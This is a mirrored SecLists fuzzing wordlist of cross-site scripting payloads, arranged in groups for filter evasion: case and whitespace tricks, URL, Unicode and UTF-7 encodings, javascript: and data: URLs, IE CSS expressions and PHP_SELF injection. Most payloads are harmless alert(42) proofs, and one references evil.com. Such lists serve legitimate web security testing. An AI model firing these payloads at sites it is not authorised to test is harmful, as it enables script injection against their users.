Backup_Repos/SecLists
1
0
Fork 0
mirror of https://github.com/danielmiessler/SecLists synced 2026-04-14 11:01:48 +02:00
Code Issues Projects Releases Wiki Activity
SecLists/Fuzzing/XSS/human-friendly/XSS-EnDe-evation.txt
Mo Langning d0b72e7e31 duplicated files
2024-02-14 12:24:12 +00:00

217 lines
7.3 KiB
Text
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# =========================================================================== #
#?
#? NAME
#? xss-evation.txt
#?
#? SYNOPSIS
#?
#? DESCRIPTION
#? List of Cross-site Scriptings (XSS) samples.
#? Empty lines and lines starting with a # are comments and should be
#? ignored. All other lines contain one payload per line.
#?
# HACKER's INFO
# This file used in EnDe's "Load File" menu.
#?
#? VERSION
#? @(#) xss-evation.txt 1.5 13/05/12 10:51:43
#?
#? AUTHOR
#? 10-jun-10 Achim Hoffmann, mailto: EnDe (at) my (dash) stp (dot) net
#?
# =========================================================================== #
#group most-in-one pattern
"'`ʼˈ‘’‚‛“”„‟′″‴‵‶‷﹅﹐"',舧艠︐︑--><script>alert(42)</script>
#group general filter evasion
"'><script>alert('XSS')</script>
"'><script>alert(/XSS/)</script>
"'><script>alert(42)</script>
"'><script>prompt(42)</script>
"'><script>confirm(42)</script>
"'><sCriPt>confirm(42)</sCriPt>
"'><script >confirm(42)</script >
"'><script foo=bar>confirm(42)</script>
"'><\script>confirm(42)</script>
"'><sc\ript>confirm(42)</script>
"'><sc\tript>confirm(42)</script>
"'><script onlyOpera:-)>alert(42)
"'><script /*%00*/>/*%00*/alert(42)/*%00*/</script /*%00*/
"'><script x:href='//evil.com/onlyOpera'>
"'><///script///>alert(42)</script>
"'><///style///>alert(42)</script>
"'><;(24)trela=daolno ;''=e>'=d
"'><;(24)trela=daolno ;''=/e>'=d
"'><isindex action="javas&Tab;cript:alert(42)" type=image>
# real tab
"'><sc ript>confirm(42)</script>
# URL-encoded
"'%3e%3cscript%3econfirm(42)%3c/script%3e
"'%253e%253cscript%253econfirm(42)%253c/script%253e
"'%25253e%25253cscript%25253econfirm(42)%25253c/script%25253e
"'%u3e%u3cscript%u3econfirm(42)%u3c/script%u3e
"'%u003e%u003cscript%u003econfirm(42)%u003c/script%u003e
"'%25u003e%25u003cscript%25u003econfirm(42)%25u003c/script%25u003e
%22%27%3e%3cscript%3econfirm(42)%3c/script%3e
%u22%u27%u3e%u3cscript%u3econfirm(42)%u3c/script%u3e
%u0022%u0027%u003e%u003cscript%u003econfirm(42)%u003c/script%u003e
%2522%2527%253e%253cscript%253econfirm(42)%253c/script%253e
%252522%252527%25253e%25253cscript%25253econfirm(42)%25253c/script%25253e
%25u22%25u27%25u3e%25u3cscript%25u3econfirm(42)%25u3c/script%25u3e
%25u0022%25u0027%25u003e%25u003cscript%25u003econfirm(42)%25u003c/script%25u003e
# Unicode characters
"'><script>\u0061lert(42)</script>
"'ܾܼscriptܾalert(42)ܼܯscriptܾ
"'%07%3e%07%3cscript%07%3ealert(42)%07%3c/script%07%3e
"'%u073e%u073cscript%u073ealert(42)%u073c/script%u073e
%07%22%07%27%07%3e%07%3cscript%07%3ealert(42)%07%3c/script%07%3e
%u0722%u0727%u073e%u073cscript%u073ealert(42)%u073c/script%u073e
"'%2507%253e%2507%253cscript%2507%253ealert(42)%2507%253c/script%2507%253e
"'%25u073e%25u073cscript%25u073ealert(42)%25u073c/script%25u073e
%2507%2522%2507%2527%2507%253e%2507%253cscript%2507%253ealert(42)%2507%253c/script%2507%253e
%25u0722%25u0727%25u073e%25u073cscript%25u073ealert(42)%25u073c/script%25u073e
#group javascript keywords
javascript:alert(42)
javascript:prompt(42)
javascript:confirm(42)
jAvasCript:confirm(42)
jAvas\Cript:confirm(42)
jAvas Cript:confirm(42)
jAvas/* */Cript:confirm(42)
javascript:alert(42)
document
document.
top
top.
top[
eval
eval(
cookie
.cookie
#group HTML event keywords
onerror
onerror=
onclick
onclick=
onmouseover
onmouseover=
onload
onload=
"onerror
"onerror=
"onclick
"onclick=
"onmouseover
"onmouseover=
"onload
"onload=
#group HTML tag attribute keywords
href=
src=
link=
style=
alt=
title=
egal=
"href=
"src=
"link=
"style=
"alt=
"title=
"egal=
#group HTML tag keywords
<a
<a href=
<a alt=42 href=
<a href="javascript:
<a href=" javascript:
<p
<div
<iframe
<index
<layer
<link
<meta
<style
<script
<img src="/" =_=" title="onerror='alert(42)'">
<img src ?notinChrome?\/onerror = alert(42)
<img src ?notinChrome?\/onerror=alert(42)
<img/alt="/"src="/"onerror=alert(42)>
<iframe/src \/\/onload = alert(42)
<iframe/onreadystatechange=alert(42)
<!-- open comment
<!-- complete comment -->
--><!-- close/complete comment -->
<![CDATA[
<![CDATA[ open cdata
<![CDATA[ complete cdata ]]>
]]><![CDATA[ close/complete cdata ]]>
<?xml
<?xml version="1.0">
#group general IE
" value=``
onmouseover=\u0061\u006C\u0065\u0072\u0074('XSS')
onmouseover=\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF14\uFF12\u1450
#group general IE CSS expression injection
<div style="{ left:expression( alert('XSS') ) }">
#group IE CSS expression variants
left:expr/**/ession(alert('XSS'))
left:expr/* */ession(alert('XSS'))
left:e\0078pr\0065ssion(alert('XSS'))
left:\0065\0078pr\0065ssion(alert('XSS'))
left:expr\65ssion(alert('XSS') ))
left:expr\0065ssion(alert('XSS'))
left:expr&#x65;ssion(alert('XSS'))
left:expr&#101;ssion(alert('XSS'))
left:expr&#x0065;ssion(alert('XSS'))
left:\ff45\ff58\ff50\ff52\ff45\ff53\ff53\ff49\ff4f\ff4e(alert('XSS'))
left:&#xff45;&#xff58;&#xff50;&#xff52;&#xff45;&#xff53;&#xff53;&#xff49;&#xff4f;&#xff4e;(alert('XSS'))
left:\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF14\uFF12\u1450
#group IE CSS expression in fullwidth (same as above)
left:(alert('XSS'))
#group IE CSS expression in capital letters
left:EXPR/**/ESSION(alert('XSS'))
left:EXPR/* */ESSION(alert('XSS'))
left:\ff25\ff38\ff30\ff32\ff42\ff53\ff33\ff29\ff2f\ff2e(alert('XSS'))
left:&#xff25;&#xff38;&#xff30;&#xff32;&#xff42;&#xff53;&#xff33;&#xff29;&#xff2f;&#xff2e;(alert('XSS'))
left:(alert('XSS'))
#group IE CSS expression with foreign Unicode letters
left:exp\0280essio\0274(alert('XSS'))
left:exp\0280essio\207f(alert('XSS'))
left:expʀessioɴ(alert('XSS'))
left:expʀessioⁿ(alert('XSS'))
# see http://openmya.hacker.jp/hasegawa/security/expression.txt also
#group Unicode Left/Right Pointing Double Angel Quotation Mark
# improved pattern from: http://jeremiahgrossman.blogspot.com/2009/06/results-unicode-leftright-pointing.html
%u00ABscript%u00BB
&#x3008;script&#x3009;
U%2bFF1CscriptU%2bFF1E
&#x2039;script&#x203A;
&#x2329;script&#x232A;
&#x27E8;script&#x27E9;
#group data: URL
href="data:text/html;charset=utf-8,%3cscript%3econfirm(42);%3c/script%3e" UTF-8 URL-encoded
href="data:text/html;charset=utf-8,%3c%73%63%72%69%70%74%3e%63%6f%6e%66%69%72%6d%28%34%32%29%3b%3c%2f%73%63%72%69%70%74%3e" UTF-8 URL-encoded (all)
href="data:text/html;base64,PHNjcmlwdD5jb25maXJtKDQyKTs8L3NjcmlwdD4=" base64
href="data:text/html;charset=utf-7,+ADw-script+AD4-confirm(42)+ADsAPA-/script+AD4-" UTF-7
href="data:text/html;charset=utf-7,+ADwAcwBjAHIAaQBwAHQAPgBhAGwAZQByAHQAKAAxACkAOwBoAGkAcwB0AG8AcgB5AC4AYgBhAGMAawAoACkAOwA8AC8AcwBjAHIAaQBwAHQAPgAKADwAcwBjAHIAaQBwAHQAPgBjAG8AbgBmAGkAcgBtACgANAAyACkAOwA8AC8AcwBjAHIAaQBwAHQAPg-" UTF-7 (all)
href="data:text/html;charset=utf-7,+ADwAcwBjAHIAaQBwAHQAPg-confirm(42)+ADsAPA-/script+AD4-" UTF-7/UTF-8 mix
href="data:text/html;charset=utf-7;base64,K0FEdy1zY3JpcHQrQUQ0LWNvbmZpcm0oNDIpK0FEc0FQQS0vc2NyaXB0K0FENC0=" UTF-7 in base64
href="data: text/html;charset=utf-7;base64,K0FEdy1zY3JpcHQrQUQ0LWNvbmZpcm0oNDIpK0FEc0FQQS0vc2NyaXB0K0FENC0=">obfuscated UTF-7 in base64
href="data:text/html;base64;charset=utf-7,+AFAASABOAGoAYwBtAGwAdwBkAEQANQBqAGIAMgA1AG0AYQBYAEoAdABLAEQAUQB5AEsAVABzADgATAAzAE4AagBjAG0AbAB3AGQARAA0AD0-" base64 in UTF-7
#group PHP
# use of $_SERVER['PHP_SELF']
%22onmouseover%3d'alert(/PHP_SELF/)'%3d%22%3e
%20%22onmouseover%3d'alert(/PHP_SELF/)'%3d%22%3e
<%<!--'%><script>alert(42);</script -->
Reference in a new issue View git blame Copy permalink